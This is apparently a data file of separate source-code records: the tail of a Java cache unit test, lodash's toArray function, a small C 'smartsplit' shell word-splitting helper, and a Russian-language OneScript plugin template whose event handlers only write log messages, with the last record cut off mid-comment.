\"anotherKey\", \"anotherValue\");\n assertNull(\"no-get\", cache.get(\"key\"));\n assertEquals(\"putIfAbsentAndGet\", \"value\", cache.putIfAbsentAndGet(\"key\", \"value\"));\n assertHasSingleKey(cache, \"key\", \"value\");\n assertEquals(\"putIfAbsentAndGet\", \"value\", cache.putIfAbsentAndGet(\"key\", \"newValue\"));\n assertHasSingleKey(cache, \"key\", \"value\");\n String anotherValueAddedToCache = new String(\"anotherValue\");\n String anotherValueNotAddedToCache = new String(\"anotherValue\");\n assertEquals(anotherValueAddedToCache, anotherValueNotAddedToCache);\n assertNotSame(anotherValueAddedToCache, anotherValueNotAddedToCache);\n String cachedValue = cache.putIfAbsentAndGet(\"anotherKey\", anotherValueAddedToCache);\n assertSame(cachedValue, anotherValueAddedToCache);\n cachedValue = cache.putIfAbsentAndGet(\"anotherKey\", anotherValueNotAddedToCache);\n assertNotSame(cachedValue, anotherValueNotAddedToCache);\n assertSame(cachedValue, anotherValueAddedToCache);\n cache.removeListener(gotListener);\n assertEquals(\"listener\", wantedListener, gotListener);\n }\n\n @Test\n public void testChangeMemSize() throws Exception {\n int size = 5;\n long ttl = 2000;\n UtilCache cache = createUtilCache(size, size, ttl, false);\n Map map = new HashMap<>();\n assertKeyLoop(size, cache, map);\n cache.setMaxInMemory(2);\n assertEquals(\"cache.size\", 2, cache.size());\n map.keySet().retainAll(cache.getCacheLineKeys());\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n cache.setMaxInMemory(0);\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n for (int i = size * 2; i < size * 3; i++) {\n String s = Integer.toString(i);\n assertKey(s, cache, s, new String(s), new String(\":\" + s), i - size * 2 + 3, map);\n }\n cache.setMaxInMemory(0);\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n cache.setMaxInMemory(size);\n for (int i = 0; i < size * 2; i++) {\n map.remove(Integer.toString(i));\n }\n // Can't compare the contents of these collections, as setting LRU after not\n // having one, means the items that get evicted are essentially random.\n assertEquals(\"map-keys\", map.keySet().size(), cache.getCacheLineKeys().size());\n assertEquals(\"map-values\", map.values().size(), cache.values().size());\n }\n\n private static void expireTest(UtilCache cache, int size, long ttl) throws Exception {\n Map map = new HashMap<>();\n assertKeyLoop(size, cache, map);\n Thread.sleep(ttl + 500);\n map.clear();\n for (int i = 0; i < size; i++) {\n String s = Integer.toString(i);\n assertNull(\"no-key(\" + s + \")\", cache.get(s));\n }\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n assertKeyLoop(size, cache, map);\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n }\n\n private static void assertKeyLoop(int size, UtilCache cache, Map map) {\n for (int i = 0; i < size; i++) {\n String s = Integer.toString(i);\n assertKey(s, cache, s, new String(s), new String(\":\" + s), i + 1, map);\n }\n }\n\n @Test\n public void testExpire() throws Exception {\n UtilCache cache = createUtilCache(5, 5, 2000, false);\n expireTest(cache, 5, 2000);\n long start = System.currentTimeMillis();\n useAllMemory();\n long end = System.currentTimeMillis();\n long ttl = end - start + 1000;\n cache = createUtilCache(1, 1, ttl, true);\n expireTest(cache, 1, ttl);\n assertFalse(\"not empty\", cache.isEmpty());\n useAllMemory();\n assertNull(\"not-key(0)\", cache.get(\"0\"));\n assertTrue(\"empty\", cache.isEmpty());\n }\n}\n"} {"text": "var Symbol = require('./_Symbol'),\n copyArray = require('./_copyArray'),\n getTag = require('./_getTag'),\n isArrayLike = require('./isArrayLike'),\n isString = require('./isString'),\n iteratorToArray = require('./_iteratorToArray'),\n mapToArray = require('./_mapToArray'),\n setToArray = require('./_setToArray'),\n stringToArray = require('./_stringToArray'),\n values = require('./values');\n\n/** `Object#toString` result references. */\nvar mapTag = '[object Map]',\n setTag = '[object Set]';\n\n/** Built-in value references. */\nvar symIterator = Symbol ? Symbol.iterator : undefined;\n\n/**\n * Converts `value` to an array.\n *\n * @static\n * @since 0.1.0\n * @memberOf _\n * @category Lang\n * @param {*} value The value to convert.\n * @returns {Array} Returns the converted array.\n * @example\n *\n * _.toArray({ 'a': 1, 'b': 2 });\n * // => [1, 2]\n *\n * _.toArray('abc');\n * // => ['a', 'b', 'c']\n *\n * _.toArray(1);\n * // => []\n *\n * _.toArray(null);\n * // => []\n */\nfunction toArray(value) {\n if (!value) {\n return [];\n }\n if (isArrayLike(value)) {\n return isString(value) ? stringToArray(value) : copyArray(value);\n }\n if (symIterator && value[symIterator]) {\n return iteratorToArray(value[symIterator]());\n }\n var tag = getTag(value),\n func = tag == mapTag ? mapToArray : (tag == setTag ? setToArray : values);\n\n return func(value);\n}\n\nmodule.exports = toArray;\n"} {"text": "/* THIS CODE IS USELESS until I find a way to use spaces in Makefile\n * variables. It seemed like a good idea at the time and I'm not deleting\n * it now because I'm a packrat. --Cliff\n */\n\n\n/*\n * This program combines with bash's IFS variable to provide smarter\n * word splitting than bash normally provides.\n *\n * cflags='-Dthis -Dthat=\"argument with spaces\"'\n * can cause problems when ${cflags} if expanded and word split and\n * becomes these four arguments:\n * -Dthis\n * -Dthat=\"argument\n * with\n * spaces\"\n *\n * So instead use:\n * saveifs=\"$IFS\"\n * cflags=`smartsplit \"${cflags}\"`\n * IFS=`smartsplit -ifs \"${cflags}\"`\n * ${cflags}\n * IFS=\"$saveifs\"\n *\n * Ugly, but it's the best thing I thought of in order to allow me to have\n * spaces in my configuration file.\n */\n\n#include \n#include \n#include \n#include \n\n/*\n * returns 1 if successful, 0 otherwise. NOTE: In theory, any character\n * that's not currently in the string could be a separator. However,\n * empirical evidence suggests that at least under bash 1.14.7.1, control-a\n * will not work as a separator. So, we try a few specific separators by\n * hand, then try any printable character, then try control-b, then give\n * up.\n */\n\nstatic int\nfindsep (const char *str, char *ifsp)\n{\n int retval;\n static char nice_separators[] = \"@:+\";\n\n retval = 0;\n\n if (!retval)\n {\n const char *nicep;\n \n for (nicep = nice_separators; !retval && *nicep; ++nicep)\n\t{\n\t if (!strchr (str, *nicep))\n\t {\n\t *ifsp = *nicep;\n\t retval = 1;\n\t }\n\t}\n }\n\n if (!retval)\n {\n int c;\n\n for (c = 0; !retval && c < 255; ++c)\n\t{\n\t if (isprint (c))\n\t {\n\t if (!strchr (str, c))\n\t\t{\n\t\t *ifsp = c;\n\t\t retval = 1;\n\t\t}\n\t }\n\t}\n }\n\n if (!retval)\n if (!strchr (str, 2))\n {\n\t*ifsp = 2;\n\tretval = 1;\n }\n return retval;\n}\n\nstatic int\nsmartsplit (const char *str, char *ifsp, char **strpp)\n{\n int retval;\n\n retval = findsep (str, ifsp);\n if (retval && strpp)\n {\n const char *ip;\n char *op;\n char current_quote;\n \n *strpp = malloc (strlen (str) + 1);\n current_quote = 0;\n for (ip = str, op = *strpp; *ip; ++ip)\n\t{\n\t if (current_quote)\n\t {\n\t *op++ = *ip;\n\t if (*ip == current_quote)\n\t\tcurrent_quote = 0;\n\t }\n\t else\n\t {\n\t if (*ip == '\\'' || *ip == '\"')\n\t\t{\n\t\t *op++ = *ip;\n\t\t current_quote = *ip;\n\t\t}\n\t else if (isspace ((unsigned char) *ip))\n\t\t*op++ = *ifsp;\n\t else\n\t\t*op++ = *ip;\n\t }\n\t}\n *op = 0;\n }\n \n return retval;\n}\n\nstatic void\noutput_prog_name (const char *prog)\n{\n const char *lastslash;\n\n lastslash = strrchr (prog, '/');\n fputs (lastslash ? lastslash + 1 : prog, stderr);\n}\n\nstatic void\nusage (const char *prog)\n{\n fputs (\"Usage: \", stderr);\n output_prog_name (prog);\n fputs (\" [-ifs] string\", stderr);\n}\n\nint\nmain (int argc, char *argv[])\n{\n int retval;\n\n retval = 0;\n switch (argc)\n {\n case 2:\n {\n\tint success;\n\tchar ifs;\n\tchar *str;\n\n\tsuccess = smartsplit (argv[1], &ifs, &str);\n\tif (success)\n\t puts (str);\n\telse\n\t {\n\t output_prog_name (argv[0]);\n\t fprintf (stderr, \": all separators used\\n\");\n\t retval = 1;\n\t }\n }\n break;\n case 3:\n if (strcmp (argv[1], \"-ifs\") == 0)\n\t{\n\t char ifs;\n\n\t smartsplit (argv[2], &ifs, 0);\n\t putchar (ifs);\n\t}\n else\n\t{\n\t usage (argv[0]);\n\t retval = 1;\n\t}\n break;\n default:\n usage (argv[0]);\n retval = 2;\n break;\n }\n return retval;\n}\n"} {"text": "#Использовать logos\n\nПерем Лог;\n\n#Область Подписки_на_события\n\n#Область Подписка_на_активизацию_плагинов\n\n// Вызывается при начале установке новых подписчиков\n//\n// Параметры:\n// МенеджерСинхронизации - Объект.МенеджерСинхронизации - ссылка на класс МенеджерСинхронизации\n//\nПроцедура ПриАктивизации(МенеджерСинхронизации) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриАктивизации> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписка_на_получение_параметров_выполнения\n\n// Вызывается при передаче параметров в МенеджерСинхронизации \n//\n// Параметры:\n// ПараметрыПодписчиков - Объект.ПараметрыПодписчиков - ссылка на класс ПараметрыПодписчиков\n// \n// Объект <ПараметрыПодписчиков> реализовывает публичные функции:\n// * Функция <Параметр>\n// \t\tПолучает и возвращает значение из индекса параметров\n//\n// \t\tПараметры:\n// \t * СтрокаИмениПараметра - Строка - имя параметра допустимо указание нескольких имен к параметру через пробел\n// \t\t Например, \"config --config -c c\"\n// \t * ЗначениеПоУмолчанию - Произвольный - возвращаемое значение в случае отсутствия параметра после получения из индекса\n// \t\tВозвращаемое значение:\n// \t Строка, Число, Булево, Массив, Соответствие, Неопределено - значение параметра\n// * Функция <ПолучитьПараметры> \n// \t\tВозвращает используемый индекс параметров \n//\n// \t\tВозвращаемое значение:\n// \t Соответствие - соответствие ключей и значение параметров\n//\n// Примеры: \n// ```\n// \n// ОтправлятьМетки = ПараметрыПодписчиков.Параметр(\"push --push P ОтправлятьМетки\", Ложь);\n//\n// ```\nПроцедура ПриПолученииПараметров(ПараметрыПодписчиков) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПолученииПараметров> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_регистрацию_команд_приложения\n\n// Вызывается при регистрации команды приложения\n//\n// Параметры:\n// ИмяКоманды - Строка - имя регистрируемой команды \n// КлассРеализации - Объект.КомандаПриложения - ссылка на класс <КомандаПриложения>\n//\nПроцедура ПриРегистрацииКомандыПриложения(ИмяКоманды, КлассРеализации) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриРегистрацииКомандыПриложения> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_начало_и_окончания_выполнения\n\n// Вызывается перед началом работы менеджера синхронизации\n//\n// Параметры:\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n// КаталогРабочейКопии - Строка - полный путь к рабочему каталогу копии\n//\nПроцедура ПередНачаломВыполнения(ПутьКХранилищу, КаталогРабочейКопии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередНачаломВыполнения> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается после завершения работы менеджера синхронизации\n//\n// Параметры:\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n// КаталогРабочейКопии - Строка - полный путь к рабочему каталогу копии\n//\nПроцедура ПослеОкончанияВыполнения(ПутьКХранилищу, КаталогРабочейКопии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеОкончанияВыполнения> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_получение_таблицы_версий\n\n// Вызывается при получении таблицы версий из хранилища конфигурации\n//\n// Параметры:\n// ТаблицаВерсий - ТаблицаЗначений - инициализированная таблица с колонками:\n// * Дата - Дата - дата версии\n// * НомерВерсии - Число - номер версии\n// \t * Комментарий - Строка - комментарий автора к версии\n// * Автор - Строка - имя автора версии в хранилище \n// \t * Тэг - Строка - метка версии в хранилище \t\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n// НачальнаяВерсия - Число - номер начальной версии хранилища\n// СтандартнаяОбработка - Булево - признак отказ от обработки по умолчанию\n//\nПроцедура ПриПолученииТаблицыВерсий(ТаблицаВерсий, ПутьКХранилищу, НачальнаяВерсия, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПолученииТаблицыВерсий> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается после получении таблицы версий из хранилища конфигурации\n//\n// Параметры:\n// ТаблицаВерсий - ТаблицаЗначений - заполненная таблица с колонками:\n// * Дата - Дата - дата версии\n// * НомерВерсии - Число - номер версии\n// \t * Комментарий - Строка - комментарий автора к версии\n// * Автор - Строка - имя автора версии в хранилище \n// \t * Тэг - Строка - метка версии в хранилище \t\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n//\nПроцедура ПослеПолученияТаблицыВерсий(ТаблицаВерсий, ПутьКХранилищу) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеПолученияТаблицыВерсий> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_получение_таблицы_пользователей\n\n// Вызывается при получении таблицы пользователей из хранилища конфигурации\n//\n// Параметры:\n// ТаблицаПользователей - ТаблицаЗначений - инициализированная таблица с колонками:\n// * Автор - Строка - имя автора версии в хранилище \n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n// СтандартнаяОбработка - Булево - признак отказ от обработки по умолчанию\n//\nПроцедура ПриПолученииТаблицыПользователей(ТаблицаПользователей, ПутьКХранилищу, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПолученииТаблицыПользователей> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается после получении таблицы пользователей из хранилища конфигурации\n//\n// Параметры:\n// ТаблицаПользователей - ТаблицаЗначений - заполненная таблица с колонками:\n// * Автор - Строка - имя автора версии в хранилище \n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n//\nПроцедура ПослеПолученияТаблицыПользователей(ТаблицаПользователей, ПутьКХранилищу) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеПолученияТаблицыПользователей> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается при получении таблицы пользователей из хранилища конфигурации\n//\n// Параметры:\n// ПутьКФайлуАвторов - Строка - полный путь к хранилищу конфигурации \n// ТаблицаАвторов - ТаблицаЗначений - инициализированная таблица с колонками:\n// * Автор - Строка - имя автора версии в хранилище \n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// СтандартнаяОбработка - Булево - признак отказ от обработки по умолчанию\n//\nПроцедура ПриПолученииТаблицыАвторов(ПутьКФайлуАвторов, ТаблицаАвторов, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПолученииТаблицыАвторов> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается при получении таблицы пользователей из хранилища конфигурации\n//\n// Параметры:\n// ПутьКФайлуАвторов - Строка - полный путь к хранилищу конфигурации \n// ТаблицаАвторов - ТаблицаЗначений - инициализированная таблица с колонками:\n// * Автор - Строка - имя автора версии в хранилище \n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n//\nПроцедура ПослеПолученияТаблицыАвторов(ПутьКФайлуАвторов, ТаблицаАвторов) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеПолученияТаблицыАвторов> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_обработки_строки_версии\n\n// Вызывается перед началом обработки таблица истории хранилища конфигурации\n//\n// Параметры:\n// ТаблицаИсторииХранилища - ТаблицаЗначений - заполненная таблица с колонками:\n// * Дата - Дата - дата версии\n// * НомерВерсии - Число - номер версии\n// \t * Комментарий - Строка - комментарий автора к версии\n// * Автор - Строка - имя автора версии в хранилище \n// \t * Тэг - Строка - метка версии в хранилище \t\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// ТекущаяВерсия - Число - текущая/последняя синхронизированная версия из файла \n// СледующаяВерсия - Число - следующая версия для обработки\n// МаксимальнаяВерсияДляРазбора - Число - максимальная версия для обработки\n//\nПроцедура ПередНачаломЦиклаОбработкиВерсий(ТаблицаИсторииХранилища, ТекущаяВерсия, СледующаяВерсия, МаксимальнаяВерсияДляРазбора) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередНачаломЦиклаОбработкиВерсий> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается перед обработкой версии хранилища\n//\n// Параметры:\n// СтрокаВерсии - СтрокаТаблицыЗначений - текущая строка из ТаблицаИсторииХранилища\n// ТекущаяВерсия - Число - текущая версия для обработки\n//\nПроцедура ПередОбработкойВерсииХранилища(СтрокаВерсии, ТекущаяВерсия) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередОбработкойВерсииХранилища> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается при обработкой версии хранилища\n//\n// Параметры:\n// СтрокаВерсии - СтрокаТаблицыЗначений - текущая строка из ТаблицаИсторииХранилища\n// ТекущаяВерсия - Число - текущая версия для обработки\n//\nПроцедура ПриОбработкеВерсииХранилища(СтрокаВерсии, ТекущаяВерсия) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриОбработкеВерсииХранилища> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается после обработкой версии хранилища\n//\n// Параметры:\n// СтрокаВерсии - СтрокаТаблицыЗначений - текущая строка из ТаблицаИсторииХранилища\n// ТекущаяВерсия - Число - текущая версия для обработки\n//\nПроцедура ПослеОбработкиВерсииХранилища(СтрокаВерсии, ТекущаяВерсия) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеОбработкиВерсииХранилища> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_выполнение_коммита\n\n// Вызывается перед фиксацией изменений в рабочей копии\n//\n// Параметры:\n// КаталогРабочейКопии - Строка - полный путь к рабочему каталогу копии\n// Комментарий - Строка - комментарий изменений при фиксации\n// Автор - Строка - автор изменений при фиксации \n// Дата - Дата - дата изменений фиксации \n//\nПроцедура ПередКоммитом(КаталогРабочейКопии, Комментарий, Автор, Дата) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередКоммитом> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается при фиксации изменений в рабочей копии\n//\n// Параметры:\n// ГитРепозиторий - Объект.ГитРепозиторий - подготовленный объект класса <ГитРепозиторий>\n// Комментарий - Строка - комментарий при фиксации изменений\n// ПроиндексироватьОтслеживаемыеФайлы - Булево - признак добавления не отслеживаемых файлов в фиксацию\n// ИмяФайлаКомментария - Строка - путь к файлу для записи комментария фиксации\n// АвторДляГит - Строка - автор изменений изменений в формате `Иванов_А `\n// ДатаДляГит - Дата - дата изменений \n// Коммитер - Строка - автор фиксации изменений в формате `Иванов_А `\n// ДатаКоммитера - Дата - дата фиксации изменений\n//\nПроцедура ПриКоммите(ГитРепозиторий,\n\t\t\t\t\t\tКомментарий,\n\t\t\t\t\t\tПроиндексироватьОтслеживаемыеФайлы,\n\t\t\t\t\t\tИмяФайлаКомментария,\n\t\t\t\t\t\tАвторДляГит,\n\t\t\t\t\t\tДатаДляГит,\n\t\t\t\t\t\tКоммитер,\n\t\t\t\t\t\tДатаКоммитера) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриКоммите> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается после фиксацией изменений в рабочей копии\n//\n// Параметры:\n// ГитРепозиторий - Объект.ГитРепозиторий - подготовленный объект класса <ГитРепозиторий>\n// КаталогРабочейКопии - Строка - полный путь к рабочему каталогу копии\n//\nПроцедура ПослеКоммита(ГитРепозиторий, КаталогРабочейКопии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеКоммита> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_начало_и_окончания_выгрузки_версии_конфигурации\n\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередНачаломВыгрузкиВерсииХранилищаКонфигурации(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередНачаломВыгрузкиВерсииХранилищаКонфигурации> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеОкончанияВыгрузкиВерсииХранилищаКонфигурации(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеОкончанияВыгрузкиВерсииХранилищаКонфигурации> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_загрузку_версии_конфигурации_из_хранилища\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередЗагрузкойВерсииХранилищаКонфигурации(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередЗагрузкойВерсииХранилищаКонфигурации> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n// СтандартнаяОбработка - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПриЗагрузкеВерсииХранилищаВКонфигурацию(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриЗагрузкеВерсииХранилищаВКонфигурацию> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеЗагрузкиВерсииХранилищаВКонфигурацию(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеЗагрузкиВерсииХранилищаВКонфигурацию> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_выгрузку_конфигурации_в_исходники\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередВыгрузкойКонфигурациюВИсходники(Конфигуратор, КаталогРабочейКопии, КаталогВыгрузки, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередВыгрузкойКонфигурациюВИсходники> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// СтандартнаяОбработка - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПриВыгрузкеКонфигурациюВИсходники(Конфигуратор, КаталогВыгрузки, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриВыгрузкеКонфигурациюВИсходники> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеВыгрузкиКонфигурациюВИсходники(Конфигуратор, КаталогВыгрузки) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеВыгрузкиКонфигурациюВИсходники> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_очистку_каталога_рабочей_версии\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередОчисткойКаталогаРабочейКопии(Конфигуратор, КаталогРабочейКопии, КаталогВыгрузки, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередОчисткойКаталогаРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// СоответствиеИменФайловДляПропуска - <Тип.Вид> - <описание параметра>\n// СтандартнаяОбработка - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПриОчисткеКаталогаРабочейКопии(КаталогРабочейКопии, СоответствиеИменФайловДляПропуска, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриОчисткеКаталогаРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// СоответствиеИменФайловДляПропуска - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеОчисткиКаталогаРабочейКопии(КаталогРабочейКопии, СоответствиеИменФайловДляПропуска) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеОчисткиКаталогаРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_перемещение_в_каталог_рабочей_копии\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередПеремещениемВКаталогРабочейКопии(Конфигуратор, КаталогРабочейКопии, КаталогВыгрузки, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередПеремещениемВКаталогРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// СтандартнаяОбработка - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПриПеремещенииВКаталогРабочейКопии(КаталогРабочейКопии, КаталогВыгрузки, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПеремещенииВКаталогРабочейКопии> для плагина <%1>\", Имя());\n\t\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеПеремещенияВКаталогРабочейКопии(КаталогРабочейКопии, КаталогВыгрузки) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеПеремещенияВКаталогРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Интерфейс_плагина\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// 